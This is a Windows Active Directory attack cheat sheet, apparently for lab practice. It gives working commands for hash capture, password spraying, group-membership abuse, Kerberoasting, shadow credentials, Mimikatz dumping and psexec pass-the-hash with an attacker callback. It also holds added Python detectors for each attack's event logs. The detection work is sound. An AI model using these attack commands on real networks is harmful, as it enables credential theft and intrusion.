A guide for Windows system enumeration and post-exploitation techniques.

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

This can be resolved by syncing your clock to the target (domain controller) time:

sudo timedatectl set-ntp off
sudo ntpdate <target>

Attacking Methods

Network

# Capture NTLM hashes with Responder
responder -I <interface> -P -r -v    # -P: Poison, -r: answers requests, -v: verbose
# Capture NTLM hashes with Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 172.16.7.50 -FileOutput Y
# or execute directly
Inveigh.exe

User

Requires one valid domain user:

# List domain users
## Using deprecated crackmapexec
crackmapexec smb <DC-IP> --users -u <username> -p <password>
 
## Using new netexec (keep the raw rid-brute lines for user objects)
nxc smb <DC-IP> -u <username> -p <password> --rid-brute | grep "SidTypeUser" > users.txt
 
# Extract usernames to file: take the part after DOMAIN\ and drop the trailing "(SidTypeUser)"
awk -F '\\' '{print $2}' users.txt | awk '{print $1}' > valid_users.txt
 
# Password spraying (use with caution - may lock accounts)
nxc smb <DC-IP> -u valid_users.txt -p <password>
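The spraying step above is exactly what an account-lockout threshold does not catch: one attempt per account never trips a per-account counter. The detector below is an added example (not part of this cheat sheet) that flags a single source failing logons against many distinct accounts inside a short window. It reads a constructed, flattened export of 4625 events; LINE_RE is an assumption and must be adapted to a real EVTX or SIEM format.

```python
"""Password-spray detection over Windows 4625 (failed logon) events.

Added example, not from the cheat sheet. Input is a constructed one-line-per-
event export (timestamp, EventID, IpAddress, TargetUserName); adapt LINE_RE
to your own export format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=4625\s+IpAddress=(?P<ip>\S+)\s+TargetUserName=(?P<user>\S+)$"
)

# Constructed sample: 10.10.14.5 hits six accounts once each within ten seconds
# (a spray); 10.10.14.9 is one user mistyping their own password twice; the
# 4624 line shows that non-4625 events are ignored.
SAMPLE_LOG = """\
2025-05-01T09:00:01 EventID=4625 IpAddress=10.10.14.5 TargetUserName=levi.james
2025-05-01T09:00:02 EventID=4625 IpAddress=10.10.14.5 TargetUserName=jane.doe
2025-05-01T09:00:04 EventID=4625 IpAddress=10.10.14.5 TargetUserName=john.smith
2025-05-01T09:00:05 EventID=4625 IpAddress=10.10.14.5 TargetUserName=svc_backup
2025-05-01T09:00:07 EventID=4625 IpAddress=10.10.14.5 TargetUserName=svc_web
2025-05-01T09:00:09 EventID=4625 IpAddress=10.10.14.5 TargetUserName=helpdesk
2025-05-01T09:00:10 EventID=4624 IpAddress=10.10.14.5 TargetUserName=helpdesk
2025-05-01T09:03:00 EventID=4625 IpAddress=10.10.14.9 TargetUserName=john.smith
2025-05-01T09:03:20 EventID=4625 IpAddress=10.10.14.9 TargetUserName=john.smith
"""


def parse_events(text):
    """Return (timestamp, source_ip, account) for every 4625 line; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["user"].lower()))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: sorted distinct accounts} for every source that failed
    logons against at least min_accounts distinct accounts inside one window."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            # distinct accounts hit in the window that opens at this attempt
            users = {u for ts, u in attempts[i:] if ts - start <= window}
            if len(users) >= min_accounts:
                alerts[ip] = sorted(users)
                break
    return alerts


if __name__ == "__main__":
    for ip, accounts in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"possible password spray from {ip}: {len(accounts)} accounts -> {accounts}")
```

A spray paced to stay under the lockout threshold (one attempt per account per observation window) will also stay under this detector if the window is too short; run it with a window at least as long as your lockout observation window, and count distinct accounts rather than attempts per account.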

Active Directory

# BloodHound collection
bloodhound-python -u '<username>' -p '<password>' \
  -ns <DC-IP> \
  -d <domain> \
  -c all \
  --zip

Exploit

Abusing AD-DACL: GenericWrite

# From Linux
## Using net rpc
net rpc group addmem "group" "username" -U "domain"/'username'%'password' -S <DC-IP>
### Example:
net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70
 
## Using bloodyAD
bloodyAD --host <DC-IP> -d <domain> -u <username> -p <password> add groupMember <group> <username>
### Example:
bloodyAD --host "10.10.11.70" -d "puppy.htb" -u "levi.james" -p 'KingofAkron2025!' add groupMember "DEVELOPERS" "levi.james"
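Both the net rpc and the bloodyAD step above produce a 4728 (member added to a security-enabled global group) event on the domain controller in which the subject and the added member are the same principal, which is not something a normal admin workflow does. The following is an added example (not from the cheat sheet or from either tool) that scans a constructed, flattened export of 4728/4732/4756 events for that self-add pattern and for any add to a sensitive group. The DN layout (OU=Staff and so on), the field order and the list of sensitive groups are assumptions.

```python
"""Detect a principal adding itself to a group, and adds to sensitive groups,
from Windows 4728/4732/4756 "member added" events.

Added example, not part of the cheat sheet. Input is a constructed flat
export; in real 4728 events the member is a DN in MemberName and the group
is in TargetUserName, which is what the parser assumes.
"""
import re

MEMBER_ADDED = {"4728", "4732", "4756"}  # global, local, universal security group
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample. Line 1 is the self-add from the example above (levi.james
# adds levi.james to DEVELOPERS); line 2 is a normal admin adding someone else;
# line 3 is a non-admin account adding a service account to Domain Admins.
SAMPLE_LOG = """\
EventID=4728 SubjectUserName=levi.james SubjectDomainName=PUPPY MemberName="CN=levi.james,OU=Staff,DC=puppy,DC=htb" TargetUserName=DEVELOPERS
EventID=4728 SubjectUserName=Administrator SubjectDomainName=PUPPY MemberName="CN=jane.doe,OU=Staff,DC=puppy,DC=htb" TargetUserName=HR
EventID=4728 SubjectUserName=jane.doe SubjectDomainName=PUPPY MemberName="CN=svc_backup,OU=Service,DC=puppy,DC=htb" TargetUserName="Domain Admins"
EventID=4624 SubjectUserName=levi.james SubjectDomainName=PUPPY
"""


def parse_line(line):
    """Split 'Key=value' and 'Key="quoted value"' pairs into a dict."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def cn_of(member_name):
    """Return the CN from a DN such as CN=x,OU=...; a DOMAIN\\user or bare
    name is passed through. Escaped commas (\\,) inside the CN are kept."""
    if member_name.upper().startswith("CN="):
        return re.split(r"(?<!\\),", member_name[3:])[0]
    return member_name.split("\\")[-1]


def find_suspicious_group_adds(text, sensitive_groups=("Domain Admins", "Enterprise Admins", "Administrators")):
    """Return (reason, subject, member, group) tuples for every group-add event
    where the subject added itself, or anyone was added to a sensitive group."""
    sensitive = {g.lower() for g in sensitive_groups}
    findings = []
    for line in text.splitlines():
        ev = parse_line(line)
        if ev.get("EventID") not in MEMBER_ADDED:
            continue
        subject = ev["SubjectUserName"]
        member = cn_of(ev["MemberName"])
        group = ev["TargetUserName"]
        if subject.lower() == member.lower():
            findings.append(("self-add", subject, member, group))
        if group.lower() in sensitive:
            findings.append(("sensitive-group", subject, member, group))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_group_adds(SAMPLE_LOG):
        print(finding)
```

The self-add check is the cheap, high-signal one; the underlying fix is the DACL itself, which BloodHound (collected above) will show as a GenericWrite or WriteProperty edge from the user onto the group. Removing that ACE is the mitigation; the event rule only tells you it was used.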

As the user is now part of the group, we can try a targeted Kerberoast attack:

python3 targetedKerberoast.py -v -d "domain" -u "username" -p "password"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
...

This ends with a list of Kerberos 5 TGS-REP etype 23 hashes. At this point, either try to crack them with hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt or use certipy for a shadow credential attack:

certipy shadow auto -u <username>@<domain> -p 'password' -k -dc-host <domain_controller> -account <targeted_account>
 
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
...
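etype 23 is RC4-HMAC, and every ticket the Kerberoast step above pulls is a 4769 (Kerberos service ticket requested) event on the domain controller with TicketEncryptionType 0x17 for a user account's SPN. The example below is added here (not part of the cheat sheet or of targetedKerberoast): it reads a constructed, flattened 4769 export, ignores machine accounts and krbtgt, and reports requesters that collected RC4 service tickets for several distinct service accounts. The field names follow the 4769 event; the line layout is an assumption.

```python
"""Kerberoast detection over Windows 4769 (TGS request) events.

Added example, not part of the cheat sheet. Input is a constructed flat
export; 4769 carries the requester in TargetUserName, the SPN owner in
ServiceName and the ticket etype in TicketEncryptionType.
"""
import re
from collections import defaultdict

FIELD_RE = re.compile(r"(\w+)=(\S+)")
RC4_ETYPE = "0x17"   # etype 23, the hashcat -m 13100 format

# Constructed sample: levi.james collects RC4 tickets for three service
# accounts; jane.doe gets one RC4 ticket for a machine account (normal noise)
# and an AES ticket; the DC renews a TGT from krbtgt.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=levi.james@PUPPY.HTB ServiceName=ca_svc TicketEncryptionType=0x17 IpAddress=10.10.14.5
EventID=4769 TargetUserName=levi.james@PUPPY.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.5
EventID=4769 TargetUserName=levi.james@PUPPY.HTB ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.14.5
EventID=4769 TargetUserName=jane.doe@PUPPY.HTB ServiceName=DC$ TicketEncryptionType=0x17 IpAddress=10.10.14.22
EventID=4769 TargetUserName=jane.doe@PUPPY.HTB ServiceName=svc_web TicketEncryptionType=0x12 IpAddress=10.10.14.22
EventID=4769 TargetUserName=DC$@PUPPY.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.11.70
"""


def parse_tgs_requests(text):
    """Return one dict per 4769 line; other event IDs are dropped."""
    events = []
    for line in text.splitlines():
        ev = dict(FIELD_RE.findall(line))
        if ev.get("EventID") == "4769":
            events.append(ev)
    return events


def roastable(service):
    """User accounts with SPNs are the Kerberoast targets; machine accounts
    (name ends in $) and krbtgt are not."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_service_tickets(events):
    """Map requester -> set of roastable service accounts for which an RC4
    (0x17) ticket was issued. Each entry is a low-severity hit on its own."""
    rc4 = defaultdict(set)
    for ev in events:
        if ev.get("TicketEncryptionType") == RC4_ETYPE and roastable(ev.get("ServiceName", "")):
            rc4[ev["TargetUserName"]].add(ev["ServiceName"])
    return rc4


def detect_kerberoast(events, min_services=2):
    """Return {requester: sorted services} for requesters holding RC4 tickets
    for at least min_services distinct roastable accounts."""
    return {u: sorted(s) for u, s in rc4_service_tickets(events).items() if len(s) >= min_services}


if __name__ == "__main__":
    for user, services in detect_kerberoast(parse_tgs_requests(SAMPLE_LOG)).items():
        print(f"possible Kerberoast by {user}: RC4 tickets for {services}")
```

Forcing AES on the service accounts (msDS-SupportedEncryptionTypes) turns these requests into etype 17/18 tickets, which are hashcat modes 19600/19700 and far slower to crack, and it makes RC4 requests rare enough to alert on individually rather than only in bulk. Long random passwords or gMSA accounts make cracking impractical regardless of etype.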

Post-Exploitation

  • Mimikatz:
# Elevate to SYSTEM
getsystem
# Load Mimikatz in Meterpreter
load kiwi
creds_all    # Dump credentials

Lateral Movement:

With Administrator credentials, use psexec to move laterally. Hash format requirement when passing the hash instead of a password:

  • Correct format: [LM hash]:[NT hash]
  • Example: 00000000000000000000000000000000:actualNTLMhashhere
# From the msfconsole prompt (background the Meterpreter session first)
use exploit/windows/smb/psexec
set RHOST <target-IP>
set SMBUser Administrator
set SMBPass <hash_with_0s>
set LHOST <attacker-IP>
run
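A psexec-style move shows up on the target as a network NTLM logon (4624, LogonType 3) followed within seconds by a new service being installed (7045 in the System log). The example below is added here (not from the cheat sheet or from Metasploit) and correlates the two on a constructed, flattened export. 7045 carries no source address, so the join is by host and time window; the Computer field on every line and the line layout are assumptions.

```python
"""Correlate a network NTLM logon (4624, LogonType 3) with a service install
(7045) on the same host shortly afterwards.

Added example, not part of the cheat sheet. Input is a constructed flat
export with a timestamp and a Computer field on every line.
"""
import re
from datetime import datetime, timedelta

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample: WS01 gets an NTLM network logon as Administrator and a
# randomly named service three seconds later; WS02 gets an unrelated service
# install 45 minutes after a normal logon; WS03 is a local console logon.
SAMPLE_LOG = """\
2025-05-01T10:00:00 Computer=WS01 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=Administrator IpAddress=10.10.14.5
2025-05-01T10:00:03 Computer=WS01 EventID=7045 ServiceName=XhLqpRtV ImagePath="C:\\Windows\\XhLqpRtV.exe"
2025-05-01T10:30:00 Computer=WS02 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=jane.doe IpAddress=10.10.14.22
2025-05-01T11:15:00 Computer=WS02 EventID=7045 ServiceName=Backup ImagePath="C:\\Program Files\\Backup\\agent.exe"
2025-05-01T12:00:00 Computer=WS03 EventID=4624 LogonType=2 AuthenticationPackageName=Kerberos TargetUserName=jane.doe IpAddress=127.0.0.1
"""


def parse_events(text):
    """Return one dict per line with the timestamp parsed into ev['ts']."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.partition(" ")
        if not rest:
            continue
        ev = {k: v.strip('"') for k, v in FIELD_RE.findall(rest)}
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def correlate_remote_service_installs(events, window=timedelta(seconds=60)):
    """Return (host, account, source_ip, service, image) for every 7045 that
    follows a network NTLM logon on the same host within `window`."""
    logons = [
        e for e in events
        if e.get("EventID") == "4624" and e.get("LogonType") == "3"
        and e.get("AuthenticationPackageName") == "NTLM"
    ]
    hits = []
    for svc in (e for e in events if e.get("EventID") == "7045"):
        for lg in logons:
            if lg["Computer"] == svc["Computer"] and timedelta(0) <= svc["ts"] - lg["ts"] <= window:
                hits.append((svc["Computer"], lg["TargetUserName"], lg["IpAddress"],
                             svc["ServiceName"], svc["ImagePath"]))
    return hits


if __name__ == "__main__":
    for hit in correlate_remote_service_installs(parse_events(SAMPLE_LOG)):
        print("service installed right after remote NTLM logon:", hit)
```

The pass-the-hash variant above is what makes the NTLM filter useful: a Kerberos-only estate, or one where NTLM network logons by privileged accounts are blocked (Protected Users, NTLM restriction policies), turns every hit of this rule into something worth a look.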